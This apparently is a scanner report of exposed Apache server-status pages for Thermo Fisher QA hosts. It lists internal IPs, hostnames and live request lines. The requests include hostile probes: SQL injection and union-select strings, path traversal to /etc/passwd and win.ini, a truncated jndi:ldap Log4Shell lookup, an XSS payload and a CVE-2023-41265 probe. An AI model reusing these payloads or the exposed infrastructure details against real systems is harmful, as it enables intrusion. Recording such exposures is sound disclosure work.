0.03573033188040.00.09658.80 10.253.106.164http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 6-0244630/155/38392_ 0.33201032972970.00.71540.23 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /tutor/filter?searched_word&searched_tution_class_type[]=1& 7-0244640/237/37793_ 0.531841034414820.00.55302.26 10.253.106.222http/1.1qa1.allergyinsider.com:80POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+( 8-0298970/9/40829_ 0.04582533958050.00.11356.81 10.253.106.222http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2020.1.0.js 9-0244650/98/43997_ 0.2001025658150.00.21286.33 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /cgi-bin/cstecgi.cgi HTTP/1.1 10-0244660/129/39312_ 0.27197830178040.00.36532.68 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/1 HTTP/1.1 11-0298980/23/48990R 0.073301025673030.00.14261.82 10.253.106.222http/1.1 12-0191690/314/38447_ 0.68197828040800.00.83363.47 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/2 HTTP/1.1 13-0254510/115/40071R 0.242201129192580.00.86259.40 10.253.106.164http/1.1 14-02545211/66/41722K 0.17122372558677.00.27445.23 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/content/multiselect/ 15-0299000/0/51569_ 0.0057030456640.00.00363.24 10.253.106.164http/1.1 16-0176210/402/86862_ 1.041661229442080.01.44322.53 10.253.106.222http/1.1qa1.allergyinsider.com:80POST /cgi-bin/vitogate.cgi HTTP/1.1 17-0148316/388/39431K 0.97529305751913.22.02301.19 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-02595020/533/34505K 1.399512259391545.423.46299.11 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-0144390/2365/38323R 5.6331410030476610.010.11432.08 10.253.106.222http/1.1 20-0280890/12/37670_ 0.02197932269100.00.05345.71 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/6 HTTP/1.1 21-0299010/17/40346R 0.043251134850240.00.08269.96 10.253.106.222http/1.1 22-0144400/2276/38894R 5.28434827720010.09.40356.71 10.253.106.164http/1.1 23-0191710/366/37842R 1.0542365131456420.01.70319.68 10.253.106.222http/1.1 24-02809116/99/38321K 0.3111513295762035.08.67299.58 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0196420/1256/37726_ 2.8991130445570.03.23302.24 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0275530/716/39321R 1.741971226907760.02.97289.53 10.253.106.164http/1.1 27-0280920/90/74642_ 0.181121229277620.00.20296.80 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e% 28-02216718/252/39239K 0.6691224982331434.62.23245.49 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0299020/5/36009_ 0.00811731873140.00.03351.91 10.253.106.164http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.css?v= HTT 30-0221680/138/39047_ 0.37197836469180.00.66329.49 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/7 HTTP/1.1 31-0148380/314/37961R 0.894631024834950.01.57338.78 10.253.106.164http/1.1 32-0191720/430/36500R 1.493071027490180.03.07261.37 10.253.106.222http/1.1 33-0280930/17/202887_ 0.0219797304460.00.03398.38 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /api/v1/database/5 HTTP/1.1 34-0280940/42/35872_ 0.0732831183580.00.08202.47 10.253.106.222http/1.1qa1.allergyinsider.com:80POST /cmisatom/cmis-online/query HTTP/1.1 35-0299030/13/36169R 0.0231211539174540.00.06225.85 10.253.106.222http/1.1 36-0280956/13/35119K 0.029205315793436.80.05232.79 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-0103066/103397/114687W 89.9500151893610.2189.03278.88 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 38-0176240/344/33432R 0.994521227885780.01.65285.79 10.253.106.164http/1.1 39-0282900/4/33834_ 0.00471127064480.00.01279.37 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /../../../../etc/passwd HTTP/1.1 40-0299040/17/35094_ 0.021901125393150.00.12298.78 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1 41-02829114/15/35040K 0.0322412287064490.30.09257.09 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0-0/0/33394. 0.00196030399390.00.00344.67 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0275620/1092/33486R 2.764301025107040.03.76279.53 10.253.106.222http/1.1 44-0299050/26/33840_ 0.101951324645350.00.14317.53 10.253.106.222http/1.1qa1.allergyinsider.com:80GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rf 45-0221730/49/36362R 0.113141230839480.00.13390.85 10.253.106.222http/1.1 46-0299060/2/33031R 0.00306925538250.00.00283.72 10.253.106.222http/1.1 47-0275640/1087/33655_ 3.181461324812790.04.26248.55 10.253.106.164http/1.1qa1.allergyinsider.com:80GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from 48-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c4b8c2f18
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 04-Jun-2024 11:06:24 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 27 days 21 hours 6 minutes 35 seconds Server load: 0.01 0.03 0.00 Total accesses: 3278952 - Total Traffic: 24.1 GB - Total Duration: 238879165 CPU Usage: u97.82 s291.05 cu4135.08 cs3669.87 - .34% CPU load 1.36 requests/sec - 10.5 kB/second - 7.7 kB/request - 72.8523 ms/request 37 requests currently being processed, 40 idle workers _K__RKK__K__R__K_RKK_.RRR___K__RRK_KKKKKK.KR__KR_KKKRKR_R______W __________.............K......._......_R._...................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0259510/169/34755_ 0.451512629057640.00.81209.10 10.253.106.226http/1.1 1-0232148/45/34843K 0.1025312248456611.90.10263.04 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0302710/877/116236_ 2.35281321943360.05.18351.80 10.253.106.226http/1.1 3-0323300/4/33399_ 0.1452634354230.00.49293.07 10.253.106.203http/1.1 4-0294660/44/36508R 0.292931228801630.01.41323.99 10.253.106.226http/1.1 5-0259582/112/36269K 0.4818611306691010.70.94298.37 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 6-05354/5/34454K 0.001147300898759.50.06504.89 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-magni 7-0232160/308/32169_ 0.791399031780160.01.15279.66 10.253.106.226http/1.1 8-0225590/1007/35689_ 2.612451230808290.03.72337.44 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-02321712/191/39085K 0.68114102231891200.91.80263.40 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/diagnostics/vendor/magnific-popup.min.js HTTP/ 10-0218680/280/35332_ 0.657417326797360.01.16515.36 10.253.106.203http/1.1 11-0244260/1197/44514_ 2.841879923573060.06.39248.15 10.253.106.226http/1.1 12-0294670/111/33545R 0.252911225681040.00.62345.37 10.253.106.226http/1.1 13-0259590/46/34501_ 0.24219025227640.02.56241.60 10.167.10.42http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 14-0238190/871/36859_ 2.34231234574970.016.39420.48 10.253.106.203http/1.1 15-0259605/68/47443K 0.53199122822922168.51.57341.53 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-05370/7/82731_ 0.01248327366940.00.03307.32 10.253.106.226http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 17-05380/0/34808R 0.00342028258650.00.00267.19 10.253.106.203http/1.1 18-05432/4/30427K 0.01601323891559.30.02263.04 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-0232181/144/32880K 0.361147278393527.60.70409.97 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 20-0232190/311/33028_ 0.6783030106320.00.85317.35 100.70.4.142http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 21-0-0/0/35489. 0.000032316270.00.00247.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0323310/13/33768R 0.042841325025310.00.07336.51 10.253.106.226http/1.1 23-05440/1/33119R 0.00278172729001410.00.00300.50 10.253.106.226http/1.1 24-051690/583/32642R 1.312851226222880.01.84256.83 10.253.106.203http/1.1 25-0259620/58/32000_ 0.20541226342090.02.21275.26 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0218890/240/34853_ 0.69601224545100.02.56268.36 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0232230/128/69089_ 0.33154113026866620.01.18273.80 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en-wo/support/rss-fee 28-05451/4/33848K 0.01191222386862.50.01220.02 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0232240/112/30485_ 0.261211229211710.00.46330.13 10.253.106.203http/1.1 30-0280770/882/34020_ 2.037513134197150.02.87290.31 10.253.106.226http/1.1 31-0323320/2/33015R 0.002961122345000.00.01315.87 10.253.106.203http/1.1 32-0259640/52/31313R 0.142961024903800.00.16239.99 10.253.106.226http/1.1 33-01767025090/91009/190076K 85.3370628395167259.2165.47371.71 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0302770/820/31223_ 1.901501128739390.02.50184.68 10.253.106.203http/1.1 35-0109310/11/31469K 0.15971613464098865.60.85211.35 10.253.106.203http/1.1www-qa.patheon.com:80GET /us/en/site-locations.html HTTP/1.1 36-0323335/9/30778K 0.0216339270887513.70.03217.36 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-01030625092/90758/102048K 75.12001422675167263.2163.76253.60 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-010962/3/29339K 0.001147252651136.80.04203.32 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc.clientlibs/diagnostics/components/content/phadia_resou 39-0274094/1941/29438K 4.824111236868023.66.45241.84 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0302791/693/29617K 1.661148230270010.62.27247.35 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc.clientlibs/diagnostics/components/structure/phadia_hea 41-0-0/0/29271. 0.004025308030.00.00198.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-02126314/1176/29915K 2.97754328695141521.06.16326.32 10.253.106.226http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 43-0302800/661/30189R 1.752891123640190.03.19267.82 10.253.106.226http/1.1 44-0259650/87/29765_ 0.191681222063730.00.44300.44 10.253.106.226http/1.1 45-0232250/265/32450_ 0.7113312128931790.01.12372.33 10.253.106.226http/1.1 46-0218965/188/29501K 0.4426010233384421.21.26257.99 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0218970/145/29222R 0.32373022945180.00.40225.05 10.253.106.203http/1.1 48-0323350/14/25306_ 0.032391222698600.00.04259.57 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 49-0212665/1101/30401K
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c560ebbb9
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 02-Jun-2024 18:41:55 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 26 days 4 hours 42 minutes 6 seconds Server load: 0.00 0.04 0.06 Total accesses: 2662908 - Total Traffic: 22.0 GB - Total Duration: 196083970 CPU Usage: u170.53 s405.95 cu3501.81 cs2707.27 - .3% CPU load 1.18 requests/sec - 10.2 kB/second - 8.7 kB/request - 73.6353 ms/request 39 requests currently being processed, 37 idle workers RR__.__.KK_.__KRK_._..KK_.__KK_.RKRK.K.K_K.W_K_K_.__K..K__._KR__ _R__R__KKR_RK.K_.KK....._....R._...R.__.RK__.................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0301010/1524/27934R 3.34485113622146020.04.58184.45 10.253.106.226http/1.1 1-024960/3294/27972R 7.3736573120438230.08.62240.06 10.253.106.203http/1.1 2-056410/2837/109099_ 6.221141217020120.07.63328.49 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0249440/1254/26454_ 2.74611223346580.03.29271.52 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-0-0/0/29402. 0.004663022114640.00.00300.36 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0215320/1108/28138_ 2.372451825932200.02.68274.00 10.253.106.226http/1.1 6-0246290/1795/27930_ 3.9266130526506770.04.36473.30 10.253.106.226http/1.1 7-0-0/0/25441. 0.004973027089380.00.00249.73 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-02153357/1161/27798K 2.6764122559944955.53.97311.40 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-02599411/1117/32680K 2.5724113182738924.63.41244.55 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-0163700/5879/28275_ 13.081851022298630.017.33489.36 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0-0/0/36859. 0.004660018972620.00.00216.53 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 12-0249460/664/26598_ 1.411511121236740.02.09323.98 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-012750/2815/27617_ 6.16118820507670.08.34214.43 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-02494716/1206/28486K 2.641621748508447.711.09362.55 10.253.106.226http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 15-0231180/5045/40691R 11.263602223319810.012.82317.66 10.253.106.203http/1.1 16-0564513/2360/75901K 5.3017913231987628.95.99285.52 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0256180/3400/26923_ 7.993011223686670.09.78241.19 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0-0/0/24269. 0.004666020073410.00.00223.03 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 19-0231230/4939/25520_ 11.51571123360800.016.59387.22 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0-0/0/25490. 0.004661025705520.00.00295.48 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0-0/0/28371. 0.004617026356530.00.00223.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-02494991/1005/26839K 2.23186122051398203.63.92311.42 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-02599641/1053/26569K 2.433412249695092.82.96271.23 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0179420/603/26251_ 1.272361322207210.01.43223.74 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0-0/0/25806. 0.004668021982050.00.00251.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-056510/2933/28602_ 6.503011120485080.07.38243.43 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0325260/597/62454_ 1.381131322876660.01.87244.96 10.253.106.203http/1.1 28-030105111/1523/27392K 3.66118121852523419.65.54197.24 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-056537/3257/24445K 7.1241025520432432.711.62310.45 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-0325270/683/27502_ 1.501171225776620.01.69272.40 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0-0/0/27793. 0.004667018232370.00.00300.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-012840/2888/25840R 6.506311121650280.09.88223.31 10.253.106.226http/1.1 33-01767010543/76462/175529K 70.5281614687140410.2139.25345.49 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0201400/4834/25424R 11.353631024715130.014.03165.00 10.253.106.226http/1.1 35-03010688/1499/26116K 3.4412917083127160258.34.39195.43 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0-0/0/26193. 0.001252023475890.00.00203.96 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-01030610545/76211/87501K 60.78101408738140414.0137.54227.38 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0-0/0/23647. 0.004624021720910.00.00182.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0128689/2896/24482K 6.46253101983937197.49.55226.71 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0301070/1428/22167_ 3.231131017890230.04.20217.28 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-020793143/1545/24477K 3.47706972264464672.94.78175.86 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0-0/0/23262. 0.004659024677180.00.00295.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-03167397/2508/24560W 5.91002008410210.512.60248.38 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 44-0137450/3650/23433_ 8.126132118349390.017.41281.72 10.253.106.203http/1.1 45-0197786/222/25065K 0.4911511244932213.20.57334.15 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-0200400/490/23038_ 1.03551519484440.01.07238.73 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c09f82fe0
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 01-Jun-2024 11:41:27 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 24 days 21 hours 41 minutes 37 seconds Server load: 0.01 0.00 0.00 Total accesses: 2210821 - Total Traffic: 20.5 GB - Total Duration: 169766908 CPU Usage: u73.2 s232.54 cu3207.14 cs2260.96 - .268% CPU load 1.03 requests/sec - 10.0 kB/second - 9.7 kB/request - 76.7891 ms/request 37 requests currently being processed, 34 idle workers KRWR.RKKRRRKRR_.KKR_.__R__K_K__..K__RKKR_R____K.K.K.__RR.___K_._ ..K__R_.RR.__.__.._R__..R_...................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0168481/3758/23220K 8.99221219293232.116.23170.96 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 1-089080/189/22188R 0.70454617157150.01.40193.04 10.253.106.203http/1.1 2-01160618/515/103686W 1.3600139526655.73.14312.17 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 3-0190960/6/21358R 0.002551220561440.00.01256.15 10.253.106.226http/1.1 4-0-0/0/23971. 0.00744019069550.00.00279.79 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0138810/24/23030R 0.082531223306810.00.22260.64 10.253.106.226http/1.1 6-0117131/83/23033K 0.3110149323536212.20.76458.22 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0190981/18/21357K 0.022102424055101.60.04234.42 10.253.106.226http/1.1qa1-designsystem.thermofisher.cGET /overview.asp HTTP/1.1 8-0117140/95/21934R 0.353191022379810.00.74286.41 10.253.106.226http/1.1 9-093680/3267/27134R 7.71276315178300.010.76228.24 10.253.106.203http/1.1 10-0163700/334/22730R 0.80247819289610.02.26474.29 10.253.106.226http/1.1 11-0129242/158/31475K 0.291601016179174.30.70194.18 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-0190990/35/22253R 0.065491218011280.00.08306.54 10.253.106.203http/1.1 13-0191000/11/23165R 0.012511116721570.00.02196.81 10.253.106.226http/1.1 14-0122870/2565/23157_ 6.48149018859610.011.09340.00 10.253.106.226http/1.1 15-0-0/0/35638. 0.00576020616960.00.00304.83 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-0138842/51/70718K 0.092021220361214.30.22265.97 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-02000534/2657/21773K 6.08914202264279.48.33221.93 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0164610/17/19737R 0.022641317236300.00.03209.58 10.253.106.203http/1.1 19-0191010/8/20567_ 0.01137820659500.00.02370.61 10.253.106.226http/1.1qa1-designsystem.thermofisher.cGET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-626%7D$%7B%3A-34 20-0-0/0/20952. 0.00696023004040.00.00283.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0138850/37/23213_ 0.081491023451910.00.12206.46 10.253.106.226http/1.1 22-0117160/103/22607_ 0.211491118171270.00.30295.99 10.253.106.226http/1.1 23-0318570/258/21321R 0.86454521608550.02.90256.21 10.253.106.203http/1.1 24-0191020/21/21535_ 0.061641019580930.00.49211.29 10.253.106.226http/1.1qa1-designsystem.thermofisher.cPOST /index.php?mod=system&op=orgtree&do=orgtree HTTP/1.1 25-0318580/307/22524_ 1.20188620120200.02.63242.90 10.253.106.226http/1.1qa1-designsystem.thermofisher.cGET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..% 26-0197985/24/23305K 0.0421112173543211.70.72228.78 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0138860/51/57332_ 0.11149819840130.00.20228.07 10.253.106.226http/1.1 28-0201201/4/22254K 0.00145015632662.00.01180.60 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-image 29-0201210/17/19097_ 0.091341121358790.00.13291.88 10.253.106.226http/1.1qa1-designsystem.thermofisher.cGET /e/ViewImg/index.html?url=javascript:alert(document.domain) 30-0198010/17/22045_ 0.08149022977250.00.16256.04 10.253.106.203http/1.1 31-0-0/0/22748. 0.00570015332600.00.00285.72 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0-0/0/20841. 0.00573018767890.00.00206.88 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-01767064917/65300/164367K 59.3100604527119810.7119.14325.38 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0201220/3/20256_ 0.00149820909360.00.00150.06 10.253.106.203http/1.1 35-0133340/2884/22510_ 7.09126929324560.012.63185.41 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base/resources 36-0117180/121/21839R 0.302931118702530.00.60191.12 10.253.106.203http/1.1 37-01030664918/65048/76338K 49.92301398193119812.8117.42207.26 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0198032/3/19761K 0.012891119671414.70.01170.04 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0198040/9/19591R 0.01248017193040.00.02204.28 10.253.106.226http/1.1 40-016150/645/17954_ 1.781881215320690.03.06205.73 10.253.106.226http/1.1qa1-designsystem.thermofisher.cPOST /index.php HTTP/1.1 41-0138870/80/19767R 0.19341819904760.00.47161.50 10.253.106.203http/1.1 42-0147870/71/18748_ 0.12144022052470.00.27279.60 10.253.106.226http/1.1qa1-designsystem.thermofisher.cGET /dlibrary/null?oldfile=../../../../../../windows/win.ini&li 43-0322470/964/19996_ 2.353859417491890.04.32229.82 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0107030/164/18297_ 0.521491215609790.01.07259.27 10.253.106.203http/1.1 45-0198290/1/19031_ 0.00301018641630.00.00314.63 10.253.106.203http/1.1 46-01983014/26/18626K 0.0415612170156830.70.11226.20 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0-0/0/19860. 0.00572017575490.00.00197.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0198315/49/17421K 0.0914541735365242.20.42237.81 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 49-0-0/0/18494. 0.00575013083170.00.00150.13
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c9a0ac4f7
